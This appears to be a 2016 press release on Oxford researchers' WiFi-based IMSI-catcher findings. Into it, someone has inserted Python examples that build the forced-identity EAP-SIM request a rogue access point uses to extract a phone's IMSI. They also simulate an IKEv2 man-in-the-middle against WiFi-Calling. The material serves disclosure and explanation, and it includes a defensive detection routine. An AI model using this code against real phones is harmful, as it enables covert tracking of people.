Tracking anyone via mobile phone (WiFi-based IMSI Catcher)
Posted: 3rd November 2016
In a presentation today at Black Hat Europe, Oxford University researchers Piers O’Hanlon and Ravishankar Borgaonkar report that they have discovered two significant privacy flaws in currently deployed mobile networks that would allow anyone to track a mobile phone with minimal cost and effort.
The flaws relate to the International Mobile Subscriber Identity (IMSI), a globally unique identifier stored on the SIM card. It identifies a mobile subscriber and allows the subscriber to be authenticated on the mobile network, so it is a significant and sensitive private identifier, designed to be seen only by the mobile operator and stored in the operator’s subscriber database.
An IMSI catcher is a piece of technology that allows specific mobile subscribers to be tracked based on their IMSI, whether the SIM is in a mobile phone, tablet, car or other mobile-connected device. Previously, IMSI catchers have been built for specialist uses such as law enforcement, and they operate in the highly regulated, licensed mobile spectrum.
The new approach uses different techniques, operating in the WiFi bands, which do not need a licence, so anyone can build an IMSI catcher using nothing more complex than an ordinary laptop or any other WiFi device.
Using that laptop, and software based on an approach described by the researchers, someone could set up a ‘rogue access point’ masquerading as a well-known automatic WiFi network (such as the WiFi available in tube stations) and so lure smartphones in range to connect. Once a phone connects, the rogue AP extracts its IMSI.
The flaws exposed by the research are present in most current smartphones, but whether they can be exploited depends on the operator’s configuration. They have now been reported both to the mobile OS vendors (Apple, Google, Microsoft and BlackBerry) and to the operators (through the GSMA). The researchers have been working with them to ensure the future protection of the IMSI, and as a result certain new features have been developed, including enhanced privacy mechanisms (conservative peer mode for EAP-SIM/AKA) in Apple’s iOS 10.
More Technical Details
The WiFi-based IMSI catcher developed by Piers and Ravishankar relies upon two flaws in the design and deployment of authentication protocols specified by the 3GPP, the main mobile standards body. Specifically, these exist in two access methods specified in [TS 33.234], both of which rely upon the SIM-based authentication protocols known as EAP-SIM and EAP-AKA.
The first method is used for access to secured ‘Automatic’ (IEEE 802.1X) WiFi networks, which have become widely deployed by many mobile operators, for example on the London Underground. The problem is that the EAP-SIM exchange is not encrypted, and during the protocol exchange the IMSI is revealed when the device first connects to the network, so it may be passively observed. The researchers have also developed an active attack which allows the IMSI to be forcibly revealed. The automatic connection is facilitated by pre-configured profiles, which are installed either automatically or manually; these profiles are provided by the mobile operators for use on iOS, Android and Windows phones.
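The EAP-SIM exchange that the rogue access point drives, as an added example (this is not code from the talk or from the 5G-ENSURE project): it builds the EAP-Request/SIM/Start carrying AT_PERMANENT_ID_REQ that forces the permanent identity, parses the response to pull the IMSI out of AT_IDENTITY, models the handset’s answer with and without the conservative peer mode mentioned above, and includes a detection-side routine that lists IMSIs seen in the clear. Frame layouts follow RFC 3748 and RFC 4186 and identity formats follow 3GPP TS 23.003; the IMSI, operator codes and pseudonym are constructed sample values, and the conservative-peer policy is a simplification of RFC 4186 section 4.2.6.

```python
"""EAP-SIM identity exchange over IEEE 802.1X as a rogue access point drives it.
Added example, not code from the Black Hat talk or the 5G-ENSURE project.
Frame layouts follow RFC 3748 (EAP) and RFC 4186 (EAP-SIM); NAI forms follow
3GPP TS 23.003 section 19.3.  IMSI, MCC/MNC and pseudonym values are constructed."""
import os
import re
import struct
from typing import Dict, List, Optional

EAP_REQUEST, EAP_RESPONSE, EAP_TYPE_IDENTITY, EAP_TYPE_SIM = 1, 2, 1, 18
SIM_START, SIM_CLIENT_ERROR = 10, 14
AT_NONCE_MT, AT_PERMANENT_ID_REQ, AT_ANY_ID_REQ, AT_IDENTITY = 7, 10, 13, 14
AT_VERSION_LIST, AT_SELECTED_VERSION, AT_CLIENT_ERROR_CODE = 15, 16, 22
# TS 23.003: the leading digit of an EAP-SIM NAI gives the identity type:
# 1 = permanent identity (the IMSI in clear), 3 = pseudonym, 5 = fast re-auth.
NAI_RE = re.compile(r"^([0-9])([0-9A-Za-z]+)@wlan\.mnc(\d{3})\.mcc(\d{3})\.3gppnetwork\.org$")
ID_KIND = {"1": "permanent", "3": "pseudonym", "5": "fast-reauth"}
SAMPLE_IMSI_NAI = "1234150999999999@wlan.mnc015.mcc234.3gppnetwork.org"   # constructed
SAMPLE_PSEUDONYM = "3k7aQpX2mZ@wlan.mnc015.mcc234.3gppnetwork.org"        # constructed


def classify_identity(nai: str) -> Dict[str, str]:
    """Identity type of a NAI and, for a permanent identity, the IMSI it carries."""
    m = NAI_RE.match(nai)
    if not m:
        return {"kind": "unknown"}
    prefix, body, mnc, mcc = m.groups()
    info = {"kind": ID_KIND.get(prefix, "unknown"), "mcc": mcc, "mnc": mnc}
    if info["kind"] == "permanent" and body.isdigit() and 6 <= len(body) <= 15:
        info["imsi"] = body
    return info


def _attr(atype: int, body: bytes) -> bytes:
    """EAP-SIM attribute TLV: type, length in 4-octet units, body padded to 4."""
    body += b"\x00" * (-(len(body) + 2) % 4)
    return struct.pack("!BB", atype, (len(body) + 2) // 4) + body


def _sim(code: int, identifier: int, subtype: int, attrs: bytes) -> bytes:
    """EAP header (code, id, length, type 18) + subtype + reserved + attributes."""
    payload = struct.pack("!BH", subtype, 0) + attrs
    return struct.pack("!BBHB", code, identifier, 5 + len(payload), EAP_TYPE_SIM) + payload


def sim_start_request(identifier: int, id_req: int = AT_PERMANENT_ID_REQ) -> bytes:
    """EAP-Request/SIM/Start.  A benign server asks with AT_ANY_ID_REQ; the active
    attack asks with AT_PERMANENT_ID_REQ so the phone answers with its IMSI."""
    attrs = _attr(AT_VERSION_LIST, struct.pack("!HH", 2, 1)) + _attr(id_req, b"\x00\x00")
    return _sim(EAP_REQUEST, identifier, SIM_START, attrs)


def sim_start_response(identifier: int, identity: str) -> bytes:
    """EAP-Response/SIM/Start with AT_IDENTITY; it crosses the air unencrypted."""
    attrs = (_attr(AT_NONCE_MT, b"\x00\x00" + os.urandom(16))
             + _attr(AT_SELECTED_VERSION, struct.pack("!H", 1))
             + _attr(AT_IDENTITY, struct.pack("!H", len(identity)) + identity.encode()))
    return _sim(EAP_RESPONSE, identifier, SIM_START, attrs)


def sim_client_error(identifier: int) -> bytes:
    """EAP-Response/SIM/Client-Error, code 0 ('unable to process packet')."""
    return _sim(EAP_RESPONSE, identifier, SIM_CLIENT_ERROR, _attr(AT_CLIENT_ERROR_CODE, b"\x00\x00"))


def parse_eap(packet: bytes) -> dict:
    """Decode an EAP frame; any NAI in EAP-Response/Identity or AT_IDENTITY is surfaced."""
    code, identifier, length, eap_type = struct.unpack("!BBHB", packet[:5])
    if length != len(packet):
        raise ValueError("EAP length field does not match frame")
    msg, data = {"code": code, "id": identifier, "type": eap_type}, packet[5:]
    if eap_type == EAP_TYPE_IDENTITY:            # plain Identity response: NAI in clear
        msg["identity"] = data.decode()
    elif eap_type == EAP_TYPE_SIM:
        msg["subtype"], attrs, pos = data[0], {}, 3
        while pos < len(data):
            if pos + 2 > len(data) or data[pos + 1] == 0 or pos + data[pos + 1] * 4 > len(data):
                raise ValueError("malformed EAP-SIM attribute")
            atype, alen = data[pos], data[pos + 1] * 4
            attrs[atype] = data[pos + 2:pos + alen]
            pos += alen
        msg["attrs"] = attrs
        if AT_IDENTITY in attrs:
            n = struct.unpack("!H", attrs[AT_IDENTITY][:2])[0]
            msg["identity"] = attrs[AT_IDENTITY][2:2 + n].decode()
    return msg


def peer_answer(request: bytes, imsi_nai: str, pseudonym: Optional[str], conservative: bool) -> bytes:
    """What the handset sends back.  Simplified conservative-peer policy after
    RFC 4186 section 4.2.6: while a pseudonym is held, a permanent-identity
    request is refused with Client-Error instead of answered with the IMSI."""
    req = parse_eap(request)
    if AT_PERMANENT_ID_REQ in req.get("attrs", {}):
        if pseudonym and conservative:
            return sim_client_error(req["id"])
        return sim_start_response(req["id"], imsi_nai)
    return sim_start_response(req["id"], pseudonym or imsi_nai)


def exposed_imsis(frames: List[bytes]) -> List[str]:
    """Detection view: IMSIs that crossed the air in the clear in these EAP frames."""
    infos = (classify_identity(parse_eap(f).get("identity", "")) for f in frames)
    return [i["imsi"] for i in infos if "imsi" in i]
```

A passive observer only needs `parse_eap` over captured EAPOL frames; the active attacker sends `sim_start_request(...)` itself and then runs `exposed_imsis` over whatever comes back. The effect of the conservative peer is visible in `peer_answer`: a handset that still holds a pseudonym refuses the forced permanent-identity request, while a handset with no pseudonym, or one running the default policy, hands over the IMSI to anyone who asks.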
The second method is used for the ‘WiFi-Calling’ service, which is deployed by a number of operators and is growing in popularity. The issue with this method is that, whilst the connection to the mobile operator’s evolved packet data gateway (ePDG) is encrypted during the setup phase of the IP security (IPsec) protocol, cryptographic certificates are not used to protect the IMSI exchange. This means that the exchange is susceptible to a man-in-the-middle attack, and so the IMSI may be revealed.
The newly developed approach provides a new way to track subscribers, but it does not allow call or data interception, as some conventional IMSI catcher devices do. It should also be noted that converting an IMSI to the corresponding telephone number is not straightforward, as it requires access to the operator’s subscriber database.
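The man-in-the-middle described above, modelled as an added example (not the researchers’ code): it simulates IKE_SA_INIT and the first IKE_AUTH request between a handset (UE) and an ePDG, once cleanly and once with an on-path attacker who substitutes the Diffie-Hellman payloads in both directions. Toy primitives stand in for the real group, PRF and cipher; the message order follows RFC 7296 and the IDi format follows 3GPP TS 23.003 section 19.3.2; the IMSI and operator codes are constructed.

```python
"""WiFi-Calling identity leak: IKEv2 IKE_SA_INIT and IKE_AUTH towards an ePDG,
with and without an active man-in-the-middle on the WiFi path.
Added example, not the researchers' code.  The DH group, key derivation and
cipher are toys standing in for the real IKEv2 primitives; the IMSI and
operator codes are constructed.  Message order follows RFC 7296 and the IDi
NAI form follows 3GPP TS 23.003 section 19.3.2."""
import hashlib
import os
from typing import Optional

P, G = 2**127 - 1, 3   # toy DH group; a real ePDG uses a 2048-bit MODP or an ECP group


def dh_keypair():
    priv = int.from_bytes(os.urandom(16), "big") % (P - 2) + 2
    return priv, pow(G, priv, P)


def sk_e(priv: int, peer_pub: int, ni: bytes, nr: bytes) -> bytes:
    """Stand-in for SKEYSEED/prf+ of RFC 7296 section 2.14: key from g^ir and nonces."""
    shared = pow(peer_pub, priv, P).to_bytes(16, "big")
    return hashlib.sha256(shared + ni + nr).digest()


def seal(key: bytes, data: bytes) -> bytes:
    """Toy XOR stream cipher (its own inverse); real IKEv2 SK payloads use e.g. AES-GCM."""
    stream = b""
    while len(stream) < len(data):
        stream += hashlib.sha256(key + len(stream).to_bytes(4, "big")).digest()
    return bytes(a ^ b for a, b in zip(data, stream))


class Party:
    """One IKEv2 endpoint: a nonce, a DH key pair and, after IKE_SA_INIT, SK_e."""
    def __init__(self) -> None:
        self.nonce = os.urandom(16)
        self.priv, self.pub = dh_keypair()
        self.key: Optional[bytes] = None

    def derive(self, peer_pub: int, ni: bytes, nr: bytes) -> None:
        self.key = sk_e(self.priv, peer_pub, ni, nr)


def run_handshake(imsi: str, mcc: str, mnc: str, mitm: bool) -> dict:
    """IKE_SA_INIT (KE, N) then the first IKE_AUTH request, which carries IDi.
    With mitm=True an on-path attacker swaps the KE payloads in both directions."""
    idi = f"0{imsi}@nai.epc.mnc{mnc}.mcc{mcc}.3gppnetwork.org".encode()   # EAP-AKA permanent id
    ue, epdg = Party(), Party()
    ni, nr = ue.nonce, epdg.nonce
    if not mitm:
        epdg.derive(ue.pub, ni, nr)          # IKE_SA_INIT request:  KEi, Ni
        ue.derive(epdg.pub, ni, nr)          # IKE_SA_INIT response: KEr, Nr
        ike_auth = seal(ue.key, idi)         # IKE_AUTH request: SK{IDi, ...}, sent before
        return {"epdg_sees": seal(epdg.key, ike_auth).decode(), "mitm_sees": None}   # any AUTH
    to_ue, to_epdg = Party(), Party()        # attacker's two DH halves
    epdg.derive(to_epdg.pub, ni, nr)         # KEi replaced on the way to the ePDG
    to_epdg.derive(epdg.pub, ni, nr)
    ue.derive(to_ue.pub, ni, nr)             # KEr replaced on the way back to the UE
    to_ue.derive(ue.pub, ni, nr)
    ike_auth = seal(ue.key, idi)
    leaked = seal(to_ue.key, ike_auth)       # attacker opens SK{IDi} ...
    relayed = seal(to_epdg.key, leaked)      # ... and re-seals it for the real ePDG
    return {"epdg_sees": seal(epdg.key, relayed).decode(), "mitm_sees": leaked.decode()}


def imsi_from_idi(idi: Optional[str]) -> Optional[str]:
    """IMSI from an EAP-AKA permanent-identity NAI ('0' + IMSI + '@' + 3GPP realm)."""
    if not idi:
        return None
    user, _, realm = idi.partition("@")
    if user[:1] == "0" and user[1:].isdigit() and realm.endswith(".3gppnetwork.org"):
        return user[1:]
    return None
```

The run makes the ordering problem concrete: in the IKEv2 EAP flow (RFC 7296 section 2.16) the UE’s IDi travels in its first IKE_AUTH message, before it has received any AUTH payload from the responder, so an unauthenticated key exchange is all that stands between the IMSI and an attacker on the path. The rogue access point from the first flaw is exactly such an attacker, and the relayed handshake means the ePDG still sees a normal-looking client.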
Notes for Editors
For further information, please contact firstname.lastname@example.org
The work was undertaken as part of the 5G-ENSURE project (www.5GEnsure.eu), funded by the EU Framework Programme for Research and Innovation Horizon 2020 under grant agreement no. 671562.
Further information: https://www.blackhat.com/docs/eu-16/materials/eu-16-OHanlon-WiFi-IMSI-Catcher.pdf